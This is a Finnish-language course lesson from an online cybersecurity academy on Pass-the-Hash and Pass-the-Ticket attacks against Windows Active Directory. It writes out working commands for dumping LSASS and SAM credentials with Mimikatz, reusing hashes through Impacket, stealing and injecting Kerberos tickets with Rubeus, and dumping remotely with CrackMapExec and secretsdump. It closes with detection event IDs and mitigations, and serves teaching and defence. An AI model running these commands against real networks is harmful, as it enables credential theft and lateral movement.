Cyber Security Academy · Oppitunti

Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset

Käytätte tunnistetietojen hajautusarvoja ja Kerberos-lippuja sivuttaisliikkumiseen tuntematta selväkielisiä salasanoja.

Oppitunti 2/413 vaihetta

Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset on ilmainen Cyber Security Academy-oppitunti CoddyKitissä. Tämä on oppitunti 2/4. Voit lukea tästä oppimispolusta kokonaan mitkä tahansa 3 oppituntia ilmaiseksi — sen jälkeen CoddyKit PRO avaa kaikki oppitunnit sekä käytännön harjoittelun sisäänrakennetulla koodieditorilla ja ympäri vuorokauden toimivalla tekoälytuutorilla. Oppitunti kuuluu Cyber Security Academy-oppimispolkuun, ja edistymisesi synkronoituu verkon ja CoddyKit-sovelluksen välillä. Cyber Security Academy-kurssilla on yhteensä 4 oppituntia.

Miksi nämä hyökkäykset ovat mahdollisia

Windowsin tunnistetietoprotokollat tallentavat todennussalaisuuksia (NTLM-tiivisteitä ja Kerberos-tikettejä) muistiin. SYSTEM-oikeudet saanut hyökkääjä voi poimia nämä salaisuudet ja käyttää niitä uudelleen todentautuakseen toisina käyttäjinä ilman salasanoja.

NTLM-tiivisteiden poimiminen Mimikatzilla

Mimikatz on Windowsin johtava tunnistetietojen poimintatyökalu. SYSTEM- tai järjestelmänvalvojan oikeuksilla suoritettuna se lukee LSASS-prosessin muistia ja poimii NTLM-tiivisteitä sekä selväkielisiä tunnistetietoja.

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

Pass-the-Hash (PtH) Mimikatzilla

PtH syöttää NTLM-tiivisteen uuteen istuntoon ilman, että selväkielistä salasanaa tarvitsee tietää. Tiiviste todentaa käyttäjän etäpalveluihin NTLM:n avulla, mikä mahdollistaa tehokkaan sivuttaissiirtymisen muihin Windows-isäntiin.

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

Pass-the-Hash Impacketilla

Impacket tarjoaa PtH:ta varten Python-työkaluja: psexec.py, smbexec.py ja wmiexec.py hyväksyvät NTLM-tiivisteet suoraan etäkomentojen suorittamista varten.

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

Kerberos-tikettien poimiminen

Myös Kerberos-tiketit tallennetaan LSASS:n muistiin. Mimikatz poimii ne, ja Rubeus on Windowsin erityisesti Kerberos-tikettien käsittelyyn tarkoitettu työkalu.

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

Pass-the-Ticket (PtT)

PtT syöttää varastetun Kerberos-tiketin nykyiseen istuntoon. Tiketti todentaa palveluihin tiketin alkuperäisen omistajan nimellä — tiivistettä tai salasanaa ei tarvita.

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

LSASS:n dumppaaminen etänä

Saavutetusta jalansijasta LSASS voidaan dumpata etänä CrackMapExecillä tai Impacketin secretsdumpilla — kohteeseen ei tarvita interaktiivista istuntoa.

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

Sivuttaissiirtymisen reitit

Kun tiivisteitä tai tikettejä on saatu, siirry sivusuunnassa: käytä PtH:ta muihin koneisiin paikallisten järjestelmänvalvojatunnusten uudelleenkäytön avulla, käytä PtT:tä toimialueen palveluihin pääsemiseksi ja etene kohti toimialueen järjestelmänvalvojan oikeuksia kohdistamalla hyökkäys etuoikeutettuihin tileihin.

PtH:n ja PtT:n havaitseminen

Puolustajat havaitsevat PtH:n esimerkiksi seuraavien avulla: Event ID 4624 -tapahtuma (kirjautuminen), jossa kirjautumistyypin arvo on 3 eikä vastaavaa interaktiivista kirjautumista ole, NTLM-todennuksen poikkeamat sekä Mimikatzin tunnusmerkit muistissa tai levyllä.

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

Lieventämistoimet

Keskeisiä lieventämistoimia ovat Credential Guardin käyttöönotto (se suojaa LSASS:ää virtualisoinnin avulla), paikallisten järjestelmänvalvojatunnusten uudelleenkäytön rajoittaminen koneiden välillä (LAPS), Protected Users -ryhmän vaatiminen etuoikeutetuilta tileiltä sekä NTLM:n poistaminen käytöstä, jos mahdollista.

Overpass-the-Hash

Overpass-the-Hash muuntaa NTLM-tiivisteen Kerberos-TGT:ksi. Tämä on hyödyllistä ympäristöissä, joissa NTLM on estetty mutta Kerberos käytettävissä, tai kun TGT:tä tarvitaan Kerberos-hyökkäysten jatkamiseen.

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

Pikatarkistus

Mikä Windowsin suojausominaisuus suojaa LSASS:n tunnistetietojen tallennusta virtualisoinnin avulla?

Yhteenveto: PtH ja PtT

Pass-the-Hash ja Pass-the-Ticket muodostavat Active Directoryn sivuttaissiirtymisen perustan. Molemmat hyödyntävät Windowsin tunnistetietojen välimuistia LSASS:ssa. Mimikatz ja Impacket tekevät tietojen poimimisesta ja uudelleenkäytöstä helppoa. Suojaudu Credential Guardilla, LAPS:lla ja Protected Users -ryhmällä sekä valvomalla NTLM- ja Kerberos-todennustapahtumia tarkasti.

Aloita maksutta

Opi Cyber Security Academy tekoälytuutorin avulla — ilmaiseksi

Kirjoita ja suorita oikeaa koodia selaimessa, saa välitöntä apua tekoälytuutorilta ympäri vuorokauden ja jatka siitä, mihin jäit, verkossa tai sovelluksessa.

Kurssit
76
Oppitunnit
303

Usein kysytyt kysymykset

Onko oppitunti ”Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset” ilmainen?

Kyllä — voit lukea täällä verkossa kokonaan ilmaiseksi mitkä tahansa Cyber Security Academy-oppimispolun 3 oppituntia, myös oppitunnin “Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset”. Sen jälkeen CoddyKit PRO avaa kaikki oppitunnit sekä interaktiiviset harjoitukset sisäänrakennetulla koodieditorilla ja ympäri vuorokauden toimivalla tekoälytuutorilla. Cyber Security Academy-kurssilla on yhteensä 4 oppituntia.

Mitä opin oppitunnilla ”Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset”?

Käytätte tunnistetietojen hajautusarvoja ja Kerberos-lippuja sivuttaisliikkumiseen tuntematta selväkielisiä salasanoja. Harjoittelet Cyber Security Academy-aihetta koodilla, jonka suoritat suoraan selaimessa. Ympäri vuorokauden käytettävissä oleva tekoälytuutori vastaa kysymyksiisi oppitunnin aikana.

Tarvitsenko kokemusta aloittaakseni Cyber Security Academy-opiskelun?

Aiempi kokemus ei ole tarpeen. CoddyKitin Cyber Security Academy-oppimispolku sopii vasta-alkajista edistyneisiin, joten voit aloittaa tästä tai alusta ja edetä omaan tahtiisi. Tämä on oppitunti 2/4.

Kuinka kauan ”Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset”-oppitunnin suorittaminen kestää?

Useimmat CoddyKitin oppitunnit kestävät noin 5–10 minuuttia. Jokainen oppitunti on lyhyt ja interaktiivinen, joten edistyt tasaisesti ja voit jatkaa siitä, mihin jäit – sekä verkossa että sovelluksessa.

Voinko kirjoittaa ja suorittaa koodia tällä Cyber Security Academy-oppitunnilla?

Kyllä. Jokainen Cyber Security Academy-oppitunti sisältää sisäänrakennetun koodieditorin, joten voit kirjoittaa ja suorittaa oikeaa koodia suoraan selaimessa ja saada välitöntä palautetta tekoälyltä – paikallista asennusta ei tarvita.

Kaikki tämän kurssin oppitunnit

  1. Windows-todennus: NTLM ja Kerberos
  2. Pass-the-Hash- ja Pass-the-Ticket-hyökkäykset
  3. Kerberoasting ja AS-REP Roasting
  4. Active Directoryn vahvistaminen
← Takaisin: Cyber Security Academy